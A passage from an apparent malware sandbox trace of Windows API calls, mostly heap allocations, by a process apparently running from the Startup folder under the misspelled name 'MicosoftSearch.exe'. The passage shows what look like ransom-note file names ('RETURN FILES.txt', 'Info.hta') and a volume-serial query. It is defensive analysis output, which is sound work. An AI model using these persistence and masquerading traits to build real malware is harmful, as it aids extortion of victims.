0xbcb758 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb770 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb788 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb7a0 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb7b8 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb7d0 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb7e8 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb800 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb818 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb830 [0240.187] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb848 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb860 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb878 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb890 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb8a8 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcb8c0 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcb8d8 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcb8f0 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xbcb908 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcb920 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81e20 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb938 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81e30 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb950 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb968 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb980 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcb998 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcb9b0 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb9c8 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcb9e0 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcb9f8 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcba10 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcba28 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcba40 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcba58 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbcba70 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcba88 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81e40 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcbaa0 [0240.188] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbcbae0 [0240.188] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb86608, Size=0x800) returned 0xba7ac8 [0240.189] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81d30, Size=0x8) returned 0xb81eb0 [0240.189] lstrlenW (lpString=".php") returned 4 [0240.189] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xba8480 | out: hHeap=0xb00000) returned 1 [0240.189] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xba84b0, Size=0x20) returned 0xb5d0b8 [0240.189] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5d0b8, Size=0x40) returned 0xb82908 [0240.189] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb82908, Size=0x80) returned 0xbc7ad8 [0240.189] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81d30, Size=0x8) returned 0xb81ec0 [0240.189] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81ec0, Size=0x10) returned 0xba84b0 [0240.189] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xba84b0, Size=0x20) returned 0xb5d068 [0240.189] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xba84e0, Size=0x20) returned 0xb841f0 [0240.189] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb841f0, Size=0x40) returned 0xb82908 [0240.189] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0240.189] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xba84e0, Size=0x20) returned 0xb841f0 [0240.189] lstrlenW (lpString="Info.hta") returned 8 [0240.189] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xba86d0, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\micosoftsearch.exe")) returned 0x6e [0240.189] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xba86d0 | out: hHeap=0xb00000) returned 1 [0240.189] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0240.189] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5d068, Size=0x40) returned 0xb82908 [0240.189] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xba84e0, Size=0x20) returned 0xb5d068 [0240.190] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xba84e0, Size=0x20) returned 0xb841f0 [0240.190] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb841f0, Size=0x40) returned 0xb82950 [0240.190] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb82950, Size=0x80) returned 0xbc7ad8 [0240.190] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc7ad8, Size=0x100) returned 0xbc9ac0 [0240.190] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0240.190] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbc9ac0 | out: hHeap=0xb00000) returned 1 [0240.190] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0xba86d0, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc [0240.190] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbcbec8 | out: hHeap=0xb00000) returned 1 [0240.190] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xba86d0 | out: hHeap=0xb00000) returned 1 [0240.190] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81ec0, Size=0x8) returned 0xb81d30 [0240.190] lstrlenW (lpString="%windir%;") returned 9 [0240.190] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb5d068 | out: hHeap=0xb00000) returned 1 [0240.190] lstrlenW (lpString="C:\\Windows;") returned 11 [0240.190] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb97ac0 | out: hHeap=0xb00000) returned 1 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xba84f8, Size=0x20) returned 0xb5d068 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb5d068, Size=0x40) returned 0xb82950 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb82950, Size=0x80) returned 0xbc7ad8 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc7ad8, Size=0x100) returned 0xbc9ac0 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81ef0, Size=0x8) returned 0xb81f00 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81f00, Size=0x10) returned 0xba8540 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xba8540, Size=0x20) returned 0xb5d068 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81ec0, Size=0x8) returned 0xb81f00 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81ed0, Size=0x8) returned 0xb81ec0 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81ef0, Size=0x8) returned 0xb81f10 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81f10, Size=0x10) returned 0xba85e8 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xba85e8, Size=0x20) returned 0xb841f0 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81f00, Size=0x10) returned 0xba85e8 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81ec0, Size=0x10) returned 0xba8618 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81f00, Size=0x8) returned 0xb81ef0 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81f20, Size=0x8) returned 0xb81f30 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xba85e8, Size=0x20) returned 0xb84240 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xba8618, Size=0x20) returned 0xb84150 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81f40, Size=0x8) returned 0xb81f50 [0240.191] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xba8690, Size=0x20) returned 0xb84268 [0240.191] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0xb97ac0, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0240.192] lstrlenW (lpString="C:\\") returned 3 [0240.192] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18fc18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fc18*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0240.192] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb97ac0 | out: hHeap=0xb00000) returned 1 [0240.192] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81f80, Size=0x82) returned 0xbc9f50 [0240.192] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81fa0, Size=0x100) returned 0xbc9fe0 [0240.192] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc9f50, Size=0x104) returned 0xbca208 [0240.192] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc9fe0, Size=0x200) returned 0xbca318 [0240.193] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb81f90 | out: hHeap=0xb00000) returned 1 [0240.193] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbca318 | out: hHeap=0xb00000) returned 1 [0240.193] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbc9b50 | out: hHeap=0xb00000) returned 1 [0240.193] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbc7c70 | out: hHeap=0xb00000) returned 1 [0240.193] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbc9b08 | out: hHeap=0xb00000) returned 1 [0240.193] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbc7cf8 | out: hHeap=0xb00000) returned 1 [0240.193] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbc9b38 | out: hHeap=0xb00000) returned 1 [0240.193] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbca208 | out: hHeap=0xb00000) returned 1 [0240.193] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbc9b20 | out: hHeap=0xb00000) returned 1 [0240.193] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbca0e8 | out: hHeap=0xb00000) returned 1 [0240.193] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbc9b68 | out: hHeap=0xb00000) returned 1 [0240.193] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbca178 | out: hHeap=0xb00000) returned 1 [0240.193] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbc9b80 | out: hHeap=0xb00000) returned 1 [0240.193] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc9b80, Size=0x20) returned 0xb84290 [0240.193] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb84290, Size=0x40) returned 0xb82950 [0240.194] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0xb87aa0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x100 [0240.194] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc9af0, Size=0x20) returned 0xb84290 [0240.194] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb84290, Size=0x40) returned 0xb82998 [0240.194] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb82998, Size=0x80) returned 0xbc7ad8 [0240.194] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc7ad8, Size=0x100) returned 0xbc9ec0 [0240.194] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc9ec0, Size=0x200) returned 0xbc9ec0 [0240.194] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc9ec0, Size=0x400) returned 0xbc9ec0 [0240.194] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc9ec0, Size=0x800) returned 0xbc9ec0 [0240.194] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc9ec0, Size=0x1000) returned 0xbdbee8 [0240.195] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81f40, Size=0x8) returned 0xb81f60 [0240.195] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9b38 [0240.195] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb81f60, Size=0x10) returned 0xbc9b08 [0240.195] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9b50 [0240.195] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9b98 [0240.195] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc9b08, Size=0x20) returned 0xb84290 [0240.195] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9b08 [0240.195] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81f60 [0240.195] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xbc9bb0 [0240.195] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xbc9bc8 [0240.195] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb84290, Size=0x40) returned 0xb82998 [0240.195] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xbc9be0 [0240.195] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xbc9bf8 [0240.195] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xbc9c10 [0240.195] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xbc9c28 [0240.195] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9c40 [0240.195] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9c58 [0240.195] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81f40 [0240.195] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9c70 [0240.195] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb82998, Size=0x80) returned 0xbc7ad8 [0240.195] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9c88 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9ca0 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9cb8 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9cd0 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9ce8 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbc9d00 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9d18 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81fa0 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9d30 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9d48 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbc9d60 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9d78 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbc9d90 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9da8 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbc9dc0 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9dd8 [0240.196] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc7ad8, Size=0x100) returned 0xbc9ec0 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9df0 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9e08 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9e20 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xbc9e38 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9e50 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9e68 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81f80 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9e80 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9e98 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xba86a8 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x6) returned 0xb81fb0 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xba8690 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9fe0 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81fc0 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbc9ff8 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca010 [0240.196] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbca028 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca040 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca058 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca070 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xbca088 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca0a0 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xbca0b8 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca0d0 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca0e8 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca100 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca118 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81fd0 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca130 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca148 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca160 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca178 [0240.197] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc9ec0, Size=0x200) returned 0xbca3c8 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca190 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81fe0 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca1a8 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca1c0 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca1d8 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca1f0 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca208 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca220 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca238 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca250 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca268 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbca280 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbca298 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca2b0 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca2c8 [0240.197] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbca2e0 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbca2f8 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca310 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbca328 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbca340 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca358 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca370 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca388 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb81ff0 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca3a0 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca5e8 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca600 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb82000 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca618 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbca630 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca648 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca660 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca678 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca690 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca6a8 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca6c0 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbca6d8 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbca6f0 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca708 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca720 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca738 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbca750 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca768 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca780 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca798 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca7b0 [0240.198] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca7c8 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca7e0 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca7f8 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb82010 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x6) returned 0xb82020 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca810 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca828 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca840 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca858 [0240.199] RtlAllocateHeap 